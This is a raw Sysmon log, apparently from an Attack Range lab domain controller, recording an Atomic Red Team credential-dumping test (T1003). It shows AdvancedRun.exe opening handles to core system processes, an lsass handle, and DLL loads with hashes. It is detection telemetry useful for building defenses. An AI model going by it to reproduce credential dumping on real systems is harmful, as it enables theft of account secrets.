17:57:45.278{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979923Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.278{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979922Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.278{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979921Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.278{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003979920Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979919Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.278{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003979918Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979917Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.278{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979912Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.278{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003979910Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979909Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.278{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979908Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.262{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979905Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.262{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979895Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.262{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003979877Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.262{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003979861Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.246{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003979860Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.246{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client 
DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979859Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.246{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979858Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.231{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979857Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.231{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003979856Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.231{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979855Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.231{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979854Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.200{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979853Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.200{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 
(rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979852Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.184{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979851Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.168{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979848Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.965{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003979847Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.965{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979846Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.965{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979845Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.965{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979844Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.965{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 
(rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979843Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.965{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979842Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.965{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979841Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 